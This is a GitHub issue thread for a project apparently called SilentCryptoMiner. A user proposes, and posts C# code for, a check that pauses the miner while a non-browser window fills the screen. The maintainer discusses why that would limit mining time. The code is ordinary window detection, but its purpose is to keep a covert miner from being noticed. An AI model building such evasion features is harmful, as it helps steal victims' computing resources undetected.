### ISSUE TITLE
disabling the miner in full screen mode

### ISSUE THREAD

**Issue by 1aminov** [UnamSanctam/SilentCryptoMiner#130]
Planning to add a miner shutdown function when applications are open in full screen mode?

**Comment by 1aminov** [comment]
@UnamSanctam ?

**Comment by UnamSanctam** [comment]
Well "fullscreen mode" would also count any window that takes up all of the screen, so if you have your browser maximized that would count as well. If you mean detecting if the application is using the DirectX fullscreen mode then that isn't really possible (easily at least), and even then most people don't use fullscreen mode anymore but borderless windowed.

**Comment by 1aminov** [comment]
@UnamSanctam using System;
using System.Diagnostics;
using System.Drawing;
using System.Runtime.InteropServices;
using System.Windows.Forms;

namespace NewMiner
{
    internal class FullScreenCheck
    {
        [StructLayout(LayoutKind.Sequential)]
        public struct RECT
        {
            public int Left;
            public int Top;
            public int Right;
            public int Bottom;
        }
        [DllImport("user32.dll")]
        private static extern IntPtr GetForegroundWindow();
        [DllImport("user32.dll")]
        private static extern IntPtr GetDesktopWindow();
        [DllImport("user32.dll")]
        private static extern IntPtr GetShellWindow();
        [DllImport("user32.dll", SetLastError = true)]
        private static extern int GetWindowRect(IntPtr hwnd, out RECT rc);

        [DllImport("user32.dll")]
        public static extern UInt32 GetWindowThreadProcessId(IntPtr hwnd, ref Int32 pid);
        private static IntPtr desktopHandle; //Window handle for the desktop
        private static IntPtr shellHandle; //Window handle for the shell
        public static bool Start()
        {
            if (isfull())
            {
                if (!isBrowser())
                {
                    return true;
                }
            }
            return false;
        }

        private static bool isBrowser()
        {
            IntPtr h = GetForegroundWindow();
            int pid = 0;
            GetWindowThreadProcessId(h, ref pid);
            Process p = Process.GetProcessById(pid);
            if (p.ProcessName == "chrome" || p.ProcessName == "firefox" || p.ProcessName == "msedge") //browsers can be added here
            {
                return true;
            }
            return false;
        }

        private static bool isfull()
        {
            desktopHandle = GetDesktopWindow();
            shellHandle = GetShellWindow();

            bool runningFullScreen = false;
            RECT appBounds;
            Rectangle screenBounds;
            IntPtr hWnd;

            //get the dimensions of the active window
            hWnd = GetForegroundWindow();
            if (hWnd != null && !hWnd.Equals(IntPtr.Zero))
            {
                //Check we haven't picked up the desktop or the shell
                if (!(hWnd.Equals(desktopHandle) || hWnd.Equals(shellHandle)))
                {
                    GetWindowRect(hWnd, out appBounds);
                    //determine if window is fullscreen
                    screenBounds = Screen.FromHandle(hWnd).Bounds;
                    if ((appBounds.Bottom - appBounds.Top) == screenBounds.Height && (appBounds.Right - appBounds.Left) == screenBounds.Width)
                    {
                        runningFullScreen = true;
                    }
                }
            }

            return (runningFullScreen);
        }
    }
}

**Comment by 1aminov** [comment]
@UnamSanctam it seems this is what i mean

**Comment by UnamSanctam** [comment]
Well first of all that's C# and not C++ and even then that would detect any program (except those manually excluded programs) that is taking up the whole screen, I always have a some window open fullscreen so the miner would then never run for me unless it's a browser I have open. I don't know about the behavior of others but I believe that's the common way to do things.

**Comment by 1aminov** [comment]
@UnamSanctam there is a browser exception in this code, miner will work with browsers

**Comment by UnamSanctam** [comment]
Yes that's what I said in the answer above.

**Comment by 1aminov** [comment]
@UnamSanctam does it make no sense in this function?

**Comment by UnamSanctam** [comment]
Well firstly it's in the wrong programming language but even then if it had that implemented it would only mine when either 1) No program is maximized or 2) A browser that's been manually excluded is maximized. The problem is that most people (from what I've seen) and me included always runs programs that they're focusing on maximized, meaning that the miner would not run very often during the day.
